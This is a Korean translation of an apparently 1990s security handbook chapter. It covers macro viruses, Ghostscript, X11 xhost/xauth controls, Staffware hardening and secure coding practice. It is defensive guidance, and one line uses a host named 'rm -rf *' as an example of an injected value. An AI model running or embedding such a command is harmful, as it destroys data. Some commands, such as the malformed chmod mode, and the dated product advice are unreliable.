• 사용자가 패스워드를 지정하면 기밀 파일들은 MS-Office 어플리케이션에 의해 추가적으로 보호된다. 이 기능이 사용되는 경우 패스워드는 두 사람이 알고 있거나, 또는 종이에 써서 잠겨진 금고에 보관하여 혹 있을지 모르는 데이타 유실을 방지해야 한다. NOTE: 이 패스워드들을 아주 쉽게 크랙할 수 있다 (이를 위한 도구가 인터넷에 있다), 따라서 이 패스워드들이 컴퓨터를 잘 아는 해커들로부터의 장벽으로 간주되어서는 안된다.
• OLE 자동화는 종종 객체들을 문서에 심는데 사용된다, 이를테면 엑셀 테이블을 워드 문서에 심는 것. 만약 엑셀 테이블의 일부가 선택되어 워드안에 심어졌다면, 그 엑셀 파일이 패스워드로 보호된다 하더라도 그 엑셀 파일에 대한 모든 정보를 워드 문서가 사용 가능하다는 사실에 주의를 돌리는 것이 중요하다. 따라서 워드 문서의 복사본이 동료에게 메일로 보내졌을 경우, 그 동료는 심어진 엑셀 파일이 패스워드로 보호된다고 하더라도 이를 읽을/변경할 수 있다.
• 사용자들은 OLE의 본질적인 보안 취약성에 대해 인지하고 있어야 한다.
• 위의 문제를 확실히 피하기 위해서는 엑셀 테이블을 텍스트로 복사하여 워드 테이블로 붙여넣거나, 필요한 정보만 포함하고 있는 새로운 엑셀 파일을 생성한다.
• 워드와 엑셀 뿐만 아니라, OLE 가능한 모든 어플리케이션에 대해 이 문제가 존재한다.
• 트로이 목마: 가져온 워드[5], 엑셀 및 액세스 파일들에서의 매크로 사용에 의해 보안 위협이 일어난다. 이를테면 사용자가 워드 (또는 엑셀 또는 액세스) 문서를 이메일로 받아서 열면, 문서 안의 매크로가 자동으로 수행되어 시스템 내에서 사용자가 접근할 수 있는 모든 파일을 읽을/쓸 수 있다 (즉 도스/윈도우 3 또는 95 에서는 모든 파일)! 이에 대한 보호는 어렵지만, 다음이 권고된다:
• 사용자들은 신뢰할 수 없는 소스로부터 온 파일을 열 때의 위험에 대해 교육받아야 한다.
• 사용자들은 신뢰할 수 없는 소스로부터의 윈워드 문서를 열 때 "shift" 키를 누르고 있어야 한다. 이것은 매크로가 자동으로 실행되는 것을 막아준다.
• 일반적으로 신뢰할 수 없는 소스로부터 온 문서는 절대 사용자들이 열어보지 말아야 한다.
• 윈워드: normal.dot 파일을 읽기 전용으로 하여, 매크로가 자동적으로 여기에 씌어지지 못하도록 한다.
• 윈워드 7.0a: 도구->옵션->일반 에서 자동 매크로 실행 옵션을 선택하지 않는다.

문서 (또는 스프레드 쉬트, 데이타베이스) 파일들은 이제 바이러스 방역 측면에서 실행파일과 같이 취급되어야 한다. 문서가 어디로부터 왔는지 알지 못하면 열기 전에 먼저 바이러스 검색을 한다. 새로운 문서 처리 응용 프로그램을 구입할 때는, 벤더에게 자동 실행과 일반 매크로를 disable 할 수 있는 기능이 있어야 한다고 하라!

• MACRO VIRUS: 1995년 8월, 위에 설명된 매크로를 포함한 한 문서가 인터넷을 돌아다녔다. 이것이 처음으로 알려진 Wordbasic 바이러스이다. 이 바이러스는 "치명적인" 것은 아니지만, 경악을 불러일으켰다. 이런 종류의 많은 바이러스들이 곧 인터넷상에 퍼지리라는 것이 추측되었음에 틀림없다. "워드에 장난치는 매크로" (Microsoft 에서 명명했듯이) 에 대한 더 많은 정보는 http://microsoft.com/msoffice/prank.htm 에서 얻을 수 있다. . 여기 Microsoft 로부터의 설명이 있다:

Microsoft 워드는 윈도우 3.1용 워드 6.0, 매킨토시용 워드 6.01, 윈도우 NT^(TM)용 워드 6.0 에서 생성되는 문서를 통해 스스로 배포되는 장난(prank) 매크로의 표적이다. 장난 매크로는 윈도우나 매킨토시용 워드의 이전 버전에는 영향을 미치지 않는다. 매크로를 포함하는 문서를 연 다음, 이후에 저장되는 문서들은 그 매크로의 복사본을 포함한다. 한번 설치되면, 이 매크로는 문서를 템플릿으로 저장할 수만 있게 한다. 이 매크로는 그 외에는 문서의 내용에 영향을 주지 않는다.

• Microsoft 가 fix를 발표했지만 (Scan831.doc) 새로운 바이러스들이 몇가지 출현하여 이미 시대에 뒤떨어졌다 (CIAC advisory G-10, Feb 1996 참조). 최신의 fix는 mvtool20.exe 로 http://www.microsoft.com/msoffice/freestuf/msword/download/mvtool 에서 얻을 수 있다. 그러나 이 도구를 과대평가하면 안되는 것이, 이것은 한가지 바이러스 (WM.Concept.A) 만 인식한다.
• Microsoft 는 아직 엑셀 DMV 바이러스에 대한 fix를 발표하지 않았다 (1996년 5월).
• 워드에 대한 Fix: 프로그램 관리자 아이콘이나 링크 (WIn95) 에서 윈워드를 시작하는 경우 워드 아이콘을 선택하고 등록정보를 선택한다. 워드 명령줄에 /mDisableMyAutoMacros 를 추가한다.
• 현재 매크로 바이러스 목록을 보려면 ftp://ftp.informatik.uni-hamburg.de/pub/virus/macro/ 이나 ftp://ftp.ncsa.com/pub/virus/WildList를 참고한다.

• Microsoft 에서 매크로나 비주얼 베이직을 쓰는 그들의 모든 어플리케이션을 변경하여 문서에 매크로가 있으면 문서를 열때 사용자에게 이를 실행할 것인지 물어보게 하기를 바란다. (현재는 그러고 있다? - 역주)
• 매크로는 DLL 도 호출할 수 있으므로, DLL 이 신뢰할 수 없는 소스로부터의 파일을 동반한다면, 이들은 보안 위험을 내포한다.
• 많은 바이러스 검사 유틸리티들이 이제는 매크로 바이러스도 검사한다. 그러한 검사기가 들어 있는지 확인한다.

WordPerfect

WordPerfect 는 매크로가 문서 파일이 아닌 별도의 파일에 저장되기 때문에 윈워드만큼 매크로 바이러스 공격에 민감하지 않다.

윈도우 도움말 파일

윈도우 도움말 파일은 DLL을 호출할 수 있다. 따라서 신뢰할 수 없는 소스로부터 온 도움말 파일은 열어보지 않도록 한다. 만약 꼭 봐야 한다면, 특권없는 (unprivileged) 사용자로서 연다.

Postscript

Postscript 는 매킨토시 세계에서 비롯되어 문서 인쇄를 위한 표준 언어가 되었다. 그러나, Postscript는 파일시스템에 대한 직접 접근을 허용할 수 있는 (레벨 2.0부터) 해석(interpredted) 언어로, 따라서 postscript 파일들을 이용하여 다른 파일들을 읽거나 쓸 수 있다!

• 따라서 Postscript "뷰어" 는 신뢰할 수 없는 사이트로부터의 postscript 파일에는 사용되지 말아야 한다. 아마도 postscript 뷰어는 일반 PC/ 워크스테이션에서는 허용되지 말아야 한다? 또는 아마도 "안전한" postscript 뷰어를 중앙에서 사용할 수 있게 해야 한다.

Ghostscript

Ghostscript 는 공개 도메인 postscript 해석기로 무료 소프트웨어 재단 (GNU) 에서 개발했다. Ghostview 는 Ghostscript 해석기 엔진을 사용하는 postscript 파일 뷰어이다. Ghostscript 는 버전 3.22 베타부터 -dSAFER 옵션을 가지고 시작되어 파일 쓰기를 허용하지 않을수 있다. Aladdin 버전은 이 fix를 가지고 있는데, GNU 버전은 없다 (아직, 1995년 9월). Ghostscript 가 다양한 프론트 엔드들로부터 불려질 수 있기 때문에, 명령줄을 변경하는 것이 항상 가능한 것은 아니다. 그러므로:

• Ghostscript 설정 파일 gs_init.ps ($GS_LIB에서, 대개 /usr/local/lib/ghostscript) 을 변경하여 다음 줄들을 주석처리한다:

% SAFER not { ( %END SAFER) .skipeof } if
......
% %END SAFER 

호스트 에뮬레이터 (vt100, vtxx0, 3270)

어떤 에뮬레이터에서는 패스워드를 키보드 매크로로 프로그램할 수 있다. 만약 이 기능이 사용된다면, 에뮬레이터 초기화 파일 (매크로가 씌어진) 은 다른 사용자들이 읽을 수 없어야 한다.이것은 홈 디렉토리가 서버상에 있을 때 특히 문제가 된다.

Teemtalk

Teemtalk 은 3270 (IBM 메인트레임 접근용) 과 VT340 (VAX 접근) 에뮬레이션을 제공하여 다양한 호스트 어플리케이션을 직접 사용할 수 있게 해준다. 두 가지 에뮬레이션 모두 파일 전송을 위한 기능을 포함하고 있다. Teemtalk 은 "Winsock" 통신 프로토콜을 사용하여, 3270 에뮬레이션에는 3174 게이트웨이를 거치고, VMS 시스템 접근은 소켓을 통해 직접한다.

에뮬레이터는 호스트 기반의 데이타에 접근할 때 필요하다. 보안 관점에서 볼 때 이것의 의미는:

1. 사용자들은 메인프레임 호스트에 접근하기 위해 사용자이름과 패스워드를 입력해야 한다. 이 패스워드들은 Telnet 프로토콜의 사용으로 인해 네트웍을 clear text 로 다니게 된다 (호스트 보안 저하).
2. 호스트와 PC 간 트러스트가 필요 없다 (호스트 보안 개선).
3. 사용자들이 다중 계정과 패스워드를 가지므로, 어디서나 동일한 패스워드를 사용할 수도 있고, 적어 놓을 수도 있고 또는 추측하기 쉬운 패스워드를 사용할 수도 있다 (보안 저하).

암호화되지 않은 상태로 네트웍을 돌아다니는 로그인 이름/패스워드는 네트웍상에 "스니퍼" 를 돌리고 있는 직원이나 건물 간 전용회선 (네트웍 절 참조) 을 "듣고 있는 (listening)" 외부 해커에 의해 "보일" 수 있다. 이는 Telnet 프로토콜의 취약성에 기인한다. 이 프로토콜에 대한 독자적인 보안 확장도 있지만 (아직) 널리 채택된 것은 없다.

X 윈도우

도입

X 윈도우 시스템은 매우 유연하고, 표준화되어 있지만, 종종 안전하지 못한 그래픽 사용자 인터페이스 (GUI)가 유닉스 시스템, PC, NT 그리고 심지어 VAX 에서도 사용가능하다.X 윈도우는 MIT 에서 (공개 도메인으로) 개발되었으며, 클라이언트/서버 기반의 아키텍쳐를 가지고 있다. 처음으로 광범위하게 채택된 X 윈도우 버전은 버전 11, 릴리즈 3 이었다. 이것은 X11R4 로 알려져 있다.?? 현재 버전은 X11R6 이다. X11이라는 말이 종종 X 윈도우 시스템 대신 사용된다. MIT의 X11은 종종 Vanilla X 로 불리워, 수많은 상업용 버전들과 구별된다.

X 클라이언트 는 프로그램 또는 application 이고 X 서버 는 화면과 윈도우를 제어하는 소프트웨어이다. 이 (좀 헷갈리는) 명명 관습은 종종 X 서버가 사용자의 로컬 시스템에서 돌아가고 클라이언트가 서버에서 돌아간다는 것을 의미한다! X 서버와 X 클라이언트는 X 프로토콜 을 통해 통신한다. X 프로토콜은 로컬 시스템에서만 운영될 수 있다 (클라이언트와 서버가 로컬일때), 또는 네트웍을 가로질러 운영될 수 있다 ( 클라이언트와 서버가 위와 같이 분리되었을 때). X 터미널 은 화면, 키보드, 마우스에다, X 터미널이 X클라이언트에게 사용 가능하도록 만드는, 통제 X 서버 소프트웨어가 같이 있는 것이다.

많은 클라이언트들이 하나의 서버 상에서 운영될 수 있다. 이 클라이언트들은 네트웍 상의 모든 시스템으로부터 온다. 클라이언트간 통신과 접근 통제 (어떤 클라이언트가 어떤 서버에서 시작할 수 있는가) 가 제어되어야 한다. 한 클라이언트가 다른 클라이언트에게 정보를 보낼 수 있다면, 다른 클라이언트에게로 가는 정보를 획득할 수 있다면, 또는 다른 클라이언트로 가는 정보를 속일(spoof) 수 있다면 보안이 침해될 수 있다.
전형적인 클라이언트간 통신에는 다음이 포함된다:

• X 터미널 설정 변경: 폰트, 색깔, 키보드 매핑 및 마우스 민감도
• X 이벤트: 키가 눌려졌다, 마우스가 움직였다, 등등..
• X 데이타: 글씨쓰기/이미지/윈도우 등 화면의 변화.

악의적인 클라이언트들은 그러한 통신을 삭제/변경 또는 대체하려고 할 수 있다.

일반적인 권고사항

• xhost 또는 차라리 xauth 메카니즘을 사용하여 (아래 참조) 디스플레이 접근을 제한한다.
• 만약 rlogin & telnet 대신 SSH를 사용하면, X 인가와 함께 자동적으로 암호화된 X 세션을 설정한다. 따라서 xauth 나 xhosts 인증이 필요하지 않다. 추천.
• 다중 사용자 시스템에서는 /tmp 에 sticky bit 이 반드시 설정되도록 한다.
• 각 사용자마다 (읽기전용) 콘솔 윈도우를 정의한다, e.g. contool로.
• 방치된 화면을 차단하기 위해 screenlock 이나 xlock 를 사용한다. 반드시 패스워드를 요구하도록 한다.
• 안전한 xterm을 설치한다.
• 표준 X 윈도우 시스템을 사용하지 않는다. 많은 유닉스 기종들이 "Trusted X11" 이라는 X11 버전을 가지고 있는데 이것은 사용해도 된다.
• 
  X11에는 두가지 주요 접근통제 메카니즘이 있다: 호스트 기반 (xhost) 과 토큰 기반 (xauth). Xhost 가 가장 간단하지만 가장 약한 메카니즘이다.

xhost

각 X 서버는 접근이 허용되는 호스트 목록을 유지하고 있다: 즉 이 호스트들로부터의 클라이언트들은 X 서버를 이용하여 윈도우를 디스플레이/조작할 수 있다. xhost 명령어는 향후 모든 연결에 대한 호스트 접근 통제 목록 (ACL) 을 관리하는데 사용된다 . 기존 연결은 영향을 받지 않는다. 몇가지 예를 들면:

어떤 사용자가 인가되지 않은 호스트로부터 서버에 연결하려고 시도한다면 (이 예제에서는 SERVER_NAME 이라고 함), 다음 에러 메시지가 발행된다:

Xlib: connection to "SERVER_NAME:0.0" refused by server.
Xlib: Client is not authorised to connect to server.

xhost 메카니즘은 순전히 호스트 기반이다, 즉 어떤 호스트가 접근을 허가받았다면, 그 호스트의 모든 사용자들은 접근이 허가된다. 호스트당 사용자 하나의 워크스테이션 환경에서는 이것이 그리 문제가 되지 않지만, 다중 사용자 서버에서는 워크스테이션으로의 접근이 허용된다면 중대한 보안 위험을 드러내는 것이다.

• 보안 레벨이 최소한 같은 호스트들 중 오로지 알려진 단일사용자 호스트들만 xhost를 통해 신뢰되어야 한다.
• 절대 xhost +, 는 쓰지 말고, .xinitrc (예를 들면) 에 한 줄을 추가하여 특정 호스트에 대한 디폴트 ACL을 생성한다. E.g. xhost +host1 +host2 +host3 +host4
• xhost 메카니즘의 사용은 "단일 사용자" 워크스테이션들 사이에서만 권고된다.
• 다중 사용자 호스트들은 접근이 허용되어서는 안되고, xauth 메카니즘이 보다 더 적절하다. xhost 가 xauth보다 우선순위가 높다는 것에 유의한다.
• 어떤 상용 X 서버들은 디폴트로 접근 통제를 disable 한다! e.g. NCD, SGI...
• ACL 을 비우려면, 스크립트가 필요하다 (xhost - 는 ACL 을 비우지 않는다), 이를테면 bourne shell 스크립트는:
• 
  for h in `xhost|awk '!/access/ {print $1}'`; do xhost -$h; done

xauth

토큰 기반 인증에서는, 사용자의 X11 세션에 토큰 (이 경우에는 난수)이 부여된다. X11서버에 연결하고자 하는 모든 클라이언트는 이 토큰을 가지고 있어야 한다. 이 토큰은 보통 X 세션을 소유하고 있는 사용자만이 가질 수 있으므로, 이 토큰이 사용자 기반의 접근통제 메카니즘을 제공한다고 할 수 있다. 이 토큰을 X11 용어로 매직 쿠키 라고 한다. 하나의 시스템에만 로그온 한 사용자에게는, 더이상의 보안은 투명하다.
매직 쿠키는 사용자 홈 디렉토리의 .Xauthority 에 저장된다. xauth 프로그램을 사용하여 이 쿠키를 추가하고 읽고 삭제한다. 쿠키를 나열하려면, xauth list 를 쓰고, 인증 상태를 보려면 xauth info 를 사용한다. xauth 만 치면 프롬프트가 뜨는데, 여기서 ? 나 help 를 입력하여 명령어 목록을 본다.

쿠키 생성:
이것은 쿠키를 만드는 표준 메카니즘이 아니다! Sun의 OpenWindows 와 XDM (아래참조)은 시작할 때 자동으로 매직 쿠키를 만들어 내지만, 다른 X11 시스템들에서는 수작업으로 쿠키를 생성해야 한다. 몇가지 다른 방법들이 가능한데, $HOST가 로컬 화면의 이름을 담고 있다면, xinit 에 다음을 사용할 수 있다:

1. korn shell 난수 발생기 사용:

xauth add ${HOST}:0.´ksh -c 'echo $(( $RANDOM*RANDOM*2 ))'´
2. Clock 사용:

xauth add ${HOST}:0.´date +"%y%m%d%H%M%S"´

난수에다 위의 TCP/IP 이름 외에도 유닉스 PC이름도 추가한다:

xauth add ${HOST}/unix:0 . RAND_NUM

쿠키 배포:
사용자가 원격 호스트에서 클라이언트를 시작하고자 한다면, 자기 로컬 디스플레이로의 접근을 어떻게 허용할 것인가? 두가지 가능성을 생각해 볼 수 있다:

1. 원격과 로컬 호스트가 이 사용자에 대해 같은 홈 디렉토리를 마운트하여, 사용자가 양쪽 호스트에서 동일한 .Xauthority 파일에 접근, 접근 통제가 자동으로 된다. (확인 요망!)
2. 홈 디렉토리가 공유되지 않는다. 이 경우에는 원격 시스템에 있는 .Xauthority 파일이 동기화되어야 한다. .rhosts 파일이 존재한다면, 다음을 사용할 수 있다.

auth extract - $DISPLAY | rsh REM_HOST xauth merge -

또는, X11R5 contrib 클라이언트인 xrsh 를 사용할 수 있으면, 원격 클라이언트는 직접 시작될 수 있다:

xrsh -auth xauth REM_HOST xload

권고사항:

• .Xauthority 파일은 사용허가 -rw------- 를 가져야 한다.
• 홈 디렉토리가 export 되면, 모두에게가 아닌 지명된 호스트들로만 export 한다. 아니면 .Xauthority 파일이 X11 서버에 접근하는 데 쉽게 사용될 수 있다.
• xauth 메카니즘은 홈 디렉토리가 공유되지 않으면 사용하기가 어렵다.
• xauth 가 사용되는 경우, xhost 메카니즘에 추가적으로 사용되어야 한다.

Sun OpenWindows

• Sunview 나 OpenWindows 아래에서 selection_svc 프로세스를 시작하지 않는다.
• Solaris 1: /etc/fbtab을 사용하여 프레임 버퍼와 외부 장치를 보호한다.
• OpenWindows 와 XView 점보 패치를 설치한다.
• OpenWindows 2.0: CIAC vulnerability B-11 을 참조.
• SUN-DES-1: TBD

Common Desktop Environment (CDE)

이것은 유닉스 데스크탑을 위한 새로운 표준 윈도우 관리자로, 주요 벤더들에 의해 지원된다. 기본적으로 HP OpenView 의 모양과 Sun의 OpenLook Tooltalk 엔진 및 데스크탑 유틸리티들을 가지는 Motif 이다. 하부의 윈도우 시스템은 X11R5 나 R6 이다.

X Display Manager (XDM)

XDM은 GUI 로그인 시스템으로 서로 다른 X 서버들로의 로그인을 가능하게 한다.

• 자신의 xdm 이 1995년 10월 이전 것이면, 업그레이드 한다. CERT VB-95:08 참조.
• XDM 으로 xauth 메카니즘을 사용할 수 있게 하려면, /usr/lib/X11/xdm/xdm-config (또는 Sun에서 $OPENWINHOME/lib/xdm/xdm-config ) 에서 다음을 설정한다. Solaris 에서는 디폴트가 enable 이다.

DisplayManager*authorize: true

XDM 은 시작할 때 자동으로 매직 쿠키를 생성하여 .Xauthority 에 복사한다.

TBD: xdm 유형의 로그인에 대한 인증 (-broadcast, -query, -indirect). 질의 방법 권고.

Xterm

가장 잘 알려진 X 클라이언트는 아마 표준 터미널 에뮬레이션인 xterm 이다. 이 도구는 보안 영역에서 몇가지 강점 & 약점이 있다. 먼저, 다음 옵션을 resource 파일에서 설정해야 한다:

xterm*allowSendEvents: False

이것은 인위적인 이벤트들 (즉 마우스나 키보드에서 발생되지 않은) 을 무시하도록 해준다. 이는 spoofing을 방지하는 데 도움이 된다.

이제는 X 서버에 의해 운영중인 모든 X 클라이언트들 간에 키보드가 공유된다. X 클라이언트가 중요한 정보를 읽고 있다면 (e.g. 패스워드), 다른 X 클라이언트들이 키입력을 읽을 수 없도록 확신하고 싶을 것이다. 키보드를 완전히 통제하기 위해 (다른 클라이언트가 입력을 받을 수 없게), xterm 은 "Secure Keyboard" 옵션을 제공하며, 메뉴에 있다 (CTRL + 왼쪽 마우스 버튼). 이 옵션은 다시 다른 윈도우에서 작업하려면 꺼져야 한다. 이때문에, 이것은 그다지 실용적이지는 않다.

패치:

• X11R5 patch level 25 또는 그 이전 버전의 xterm은 로깅 옵션(-l)과 함께 쓸 때 취약점을 가지고 있다.

작업 플로우 관리자 (Workflow Managers)

Staffware V5

일반

Staffware 는 복잡한 관리적 루틴들이 자동화될 수 있게 해주는 작업 플로우 관리자이다.

중요한 이슈:
* Oracle 과의 상호작용
* OLTP 연결 세부사항, Staffware 서버들간의 RPC 통신
* 트랜잭션 무결성?

책임추적성

사용자 식별 / 인가

• 유닉스 로그인 보안: 설치를 위해 다음 사용자들이 정의되어야 한다:
• swadmin 은 Staffware 관리자로 특별한 권한을 가진다.
• pro 는 비 대화형 사용자로, Staffware 백그라운드 작업을 위한 것이다. 이 계정은 막아놓는다.
• Staffware 서버는 root 아래서 돌아간다.
• 모든 staffware 사용자들은 유닉스 계정도 가지고 있다.
• 조치:
• 각 사용자에 대해 umask 는 027로 설정되어, 생성되는 모든 파일들이 사용허가 rwxr-x--- (그룹은 읽기와 실행 가능) 를 가지도록 해야 한다. 이 경우 그룹이 반드시 있어야 하고 Staffware 파일들에게 부여되어야 한다.
• 각 사용자에 대해 umask 를 077로 설정, 생성되는 모든 파일이 사용허가 rwx------ 를 가지도록 해야 한다 .

감사 증적

Staffware 운영에 대한 상세한 감사 증적이 가능하다.

• 모든 로그파일들은 사용허가 0600을 가지고 주기적으로 모니터되고, 보관 및 가지치기 되어야 (pruned-쓸모없는 것 버리기) 한다.
• 유닉스 시스템 로그에서는 OLTP 운영과 관리에 사용되는 유닉스 계정으로의 접근 시도에 대한 기록을 남겨야 한다 (e.g. syslogd 를 통해).
• Staffware 에러는 $SWDIR/logs 에 있는 sw_warn 나 sw_error 파일에 쓰여진다.

접근 통제

• 일반적인 Staffware 보안 기능:
• 전자서명 뿐 아니라 패스워드도 작업 플로우 & 데이타 보호를 제공.
• 필드 보호 가능..
• 제한적 접근의 사용자 특정 메뉴.
• 중앙 데이타 테이블에 대한 접근 통제.
• 프로시져는 정의한 사람이 소유.
• 관리자 접근은 특정 사용자나 그룹으로 제한됨.
• $SWDIR 디렉토리에 대해 파일과 디렉토리 사용허가가 각각 설정되어야 한다. 즉,
• 
  chmod 700 ~$SWDIR
  chmod -R w-rwx,g-rwx ~$SWDIR/*
  chown -R root ~$SWDIR/*
• Staffware 백업은 $SWDIR 에 있는 swdefs 파일에 적힌 디렉토리로 수행된다. 이 디렉토리는 관리자만 소유해야 하고 모든사람이 읽을 수 있어서는 안된다.
• 윈도우용 Staffware 를 사용하는 경우, 파일 사용허가 검사 레벨은 다음 중 하나로 지정되어야 한다 (설치되는 동안):
• 1. 검사 안함: 권고하지 않음!
  2. PC 는 666 으로 파일 생성. 권고하지 않음!
  3. PC 는 올바른 사용자와 그룹이 소유하도록 파일을 생성하고 사용허가 660을 가지도록 함. 모든 Staffware 사용자들은 해당 그룹에 속해야 함. 이 옵션을 사용한다.

객체 재사용

N/A

안전한 데이타 교환

Oracle 과의 통신:
Staffware 는 데이타를 Oracle 테이블에 저장하고 SQL을 통해 Oracle과 통신한다.

Staffware 다중 노드 구성:
Staffware 서버들은 서버들간의 작업 플로우를 조정하기 위해 서로 서로 대등하게 통신할 수 있다.

• 모든 노드들은 동등하다.
• 각 프로시져는 프로시져와 그 테이블들이 생성되고 편집되며 발행된 스텝들이 보내질 지정 호스트노드를 가지고 있다. 이 노드는 그 프로시져에 관계된 사용자, 역할, 리스트와 테이블 파일들의 마스터 본을 가지고 있다. 그 프로시져에 참여하는 다른 모든 노드들은 종속 노드들이다 (그 프로시져에 관한 한). 노드들은 영구적인 백그라운드 작업을 통해 통신한다.
• 종속 노드들은 대개 cron으로부터 Pstaddifc SENDDATA [slave node] [proc] 로 갱신된다 (pushed). 종속 노드들은 또한 Pstaddifc GETDATA [host node] [proc] 로 정보를 pull 할 수도 있다.
• V5 는 다중 노드 구성에서의 통신을 위해 이메일을 사용한다. 주된 관심사는 RPC 통신에 있기 때문에 이것은 여기에서 논의되지 않는다.

통신 상대방 인증

• 윈도우용 Staffware 를 사용할 때, 윈도우 사용자들은 반드시 패스워드를 입력하도록 요구해야 한다 (설치시 지정됨).
• TBD: RPC ?

무결성

데이타 전송의 무결성은 TCP/IP와 RPC 또는 이메일 전송에 의해 보장된다.

기밀성

패스워드는 clear text 로 네트웍을 통해 전송된다.

송/수신 부인 방지

전자 서명은 지원되지 않는다.

가용성

백업

• Staffware 는 케이스 데이타 파일들을 온라인 디렉토리로 백업할 수 있게 한다. 이 디렉토리는 $SWDIR에 있는 swdefs 에 지정되어 있다. 그러면 시스템 백업 도구들을 사용하여 이 디렉토리를 오프라인 매체로 백업할 수 있다.
• 백업이나 복원 중에는 어떤 사용자도 Staffware 에 로그인할 수 없다 (저자의 의견으로는 주된 제약사항). export 기능 (테이블, 리스트 및 프로시져에 대한) 도 사용자가 온라인일 때는 사용할 수 없다.
• 증량적 (incremental) 백업은 불가능하다.
• Staffware 백업은 다른 시스템으로 복원될 수 없다 (대신 export 기능을 사용한다).
• 개인 사용자는 자기 홈 디렉토리 밑의 staff.dir/procdef.bak 서브 디렉토리에 자신의 프로시져들을 백업할 수 있다. swadmin 사용자는 모든 프로시져들을 백업할 수 있다.

중복성 (Redundancy)

없다?

EDI

Electronic Data Interchange (전자 문서 교환) 은 송장, 주문서 등을 전자적으로 교환하는 업무의 한 방법이다. 여러가지 표준들이 많이 있다. 보안 이슈들에 대한 상세한 논의는 Swisscom 의 기술 잡지 "Telecom PTT Technische Mitteilungen 2-1994" 에 있는 Orla Greevy (mailto:greevy_o@vptt.ch)의 "Security and EDI"를 참고하기 바란다.

안전한 어플리케이션 개발

일반적인 지침

• 올바른 엔지니어링:
  • 작업을 문서화 한다. 예를 들어 어플리케이션 구조 및 구성요소, 데이타흐름, 이벤트 모델, 구성요소들 간의 종속성, 외부 구성요소에 대한 종속성 (라이브러리, include 파일, HTML 페이지, 데이타베이스 등등), 파일: 로깅/포맷/사용허가/경쟁상태, 통신 채널/프로토콜 사용 (이메일, X.25, 텔넷, ftp, 소켓, IPC,...)
  • 과업을 수행하기 위해 필요한 최소한의 권한만을 사용한다.
  • 과업을 수행하기 위해 필요한 최소한의 기능만을 사용한다.
  • 버퍼 오버런, 파일 경쟁상태, 사용자 입력의 확인 등 고전적인 보안 문제들을 고려한다.
  • 재검토: 코드가 입증됐거나 peer review 에 회부되었는가, 특히 코드가 네트웍 서비스, SUID 로 또는 특별한 권한 (관리자/root) 을 가지고 수행되는 경우. 검토자들이 자기 분야를 정말 알고 있는 숙련자/전문가인지 확인하라.
  • 테스트 소프트웨어 :사용량, 버퍼 오버플로우, 메모리 누출, 명령줄 매개변수, 환경변수, 예기치않은 (또 큰) 입력.
• 스타일:
  • 단순하게 (바보같이) 하라! (KISS: Keep It Simple and Stupid). 쓸 줄 안다는 이유만으로 언어의 색다른 기능들을 사용하지 말라.
  • 명확성을 위해 괄호를 사용한다. 연산 우선순위에 의존하지 않는다 - 의심이 갈 땐 괄호를 쓴다.
  • 스스로 주석이 되는 변수 & 함수 이름들을 사용한다.
  • 독립변수(arguments)를 서브루틴 매개변수로 전달한다 (전역[global] 변수를 사용하기 보다는). 그러나 이를 극단적으로 취하지는 않도록 한다, 전역 변수도 유용할 수 있다.
  • 실용적인 주석들을 넣는다, 특히 코드가 복잡하거나 애매할 때.
  • main() 을 작게 유지한다 (한 페이지).
  • 결정적인 코드 부분은 작고, 단순하고 분리되어 유지되어야 한다.
• 코드 안에 절대 비밀 백도어를 넣지 않도록 한다. 오랫동안 비밀로 있지는 않을 것이다.
• 파일 & 네트웍 I/O:
  • 다 쓴 후에는 열려 있는 파일들을 닫는다.
  • 특히 파일을 잠글 때, open()이나 unlink() 같은 중요한 함수의 리턴값을 항상 검사한다. 파일에 쓸때, 디스크가 꽉 찼으면 OS가 그 파일을 절단할 수 있다: 리턴값을 검사한다.
  • 파일 잠그기: 다중 인스턴스/쓰레드/프로세스가 사용할 가능성이 있는 파일들은 잠그고 가능한한 최단시간동안 잠근다.
  • 자기가 올바른 디렉토리에 있다고 가정하지 않도록 한다 - 올바른 디렉토리로 명백하게 chdir() 한다.
  • 자원 잠식과 프로세스 정체를 피하기 위해, 네트웍 데이타를 전송할 때와 기다릴 때 시간제한을 둔다.
  • 1000 보다 작은 포트 번호를 더이상 신뢰하지 않도록 한다.
  • 송신 IP 주소가 올바르다고 가정하지 않는다.
• 쓰레드 & 프로세스:
  • 리턴값을 검사한다.
  • 데드락을 찾는다.
  • 다중 쓰레드가 가은 변수를 읽거나 쓸 때의 결과를 생각해본다: 동기화, 순번정하기, 잠금, 가시성.
  • 단일프로세스에서도 경쟁 상태 (race condition) 를 찾아본다.
  • 서브 프로세스를 호출하기 전에 환경을 정리한다.
• 힙을 신중하게 관리한다.
• 문서: 어플리케이션 구조와 구성요소, 데이타흐름, 이벤트 모델, 구성요소들 간의 종속성, 외부 구성요소에 대한 종속성 (라이브러리, include 파일, HTML 페이지. 데이타베이스, 등등), 로깅 파일과 형식 (파일 잠금?), 통신 채널/프로토콜 사용 (email, X.25, telnet, ftp, sockets, IPC, ...)
• 보안:
  • 사용자 이름과 패스워드를 clear text 로 보내지 않는다.
  • 암호화:
    - PGP나 3DES, IDEA 등등의 사용을 고려한다, 그러나 XOR (또는 다른 시시한 알고리듬) 은 아니다 .
    - MD5 같은 해시 알고리듬은 한쪽이 사용자이름과 패스워드의 사본을 가지고 있고 다른 쪽도 그것을 가지고 있다는 것을 확인하고자 하는 경우 사용될 수 있다. 이것은 그러나 재생 공격이나 위장의 문제를 해결하지는 못한다 (그 문제에 대해서는 시간이 찍힌 데이타에 서명하는 것이 해법이다).
  • 암호화되지 않은 패스워드를 메모리에 두지 말고, 필요치 않을 때는 배열을 비운다, 안그러면 coredump 때 보일 수 있다.
  • 필요할 때는 문자열 크기를 검사한다 (다른 배열 오버플로우도).
  • 환경 변수와 명령줄 변수 (arguments) 는 사용전에 깨끗이 한다.
  • DNS를 너무 믿지 않는다. DNS lookup 이 rm -rf * 이라는 호스트를 리턴했을 때 자기 프로그램에 어떤 일이 발생할 지를 상상해 보라.
  • 동적 라이브러리 사용이 보안에 미치는 효과를 생각해 본다. 민감한 데이타를 다루는 프로그램에 대해서는 동적 로딩을 피한다..
  • 프로세스/파일에 필요한 최소한의 권한만을 준다.
• 어플리케이션 이벤트들의 로그를 생성한다: e.g. 날짜, 시간, UID, GID (& eff. UID, GID), 터미널/컴퓨터/IP 주소, 사용자 이름, PID, 에러 번호/텍스트. 플랫폼에 맞는 로그 형식을 사용한다 (e.g. syslog, NT event log). 서로 다른 레벨의 로깅을 설정할 수 있게 한다.

유닉스 어플리케이션 개발

[unix1] 과 유닉스 장 도 참고한다.

• 파일을 열기 전에 umask 를 설정한다
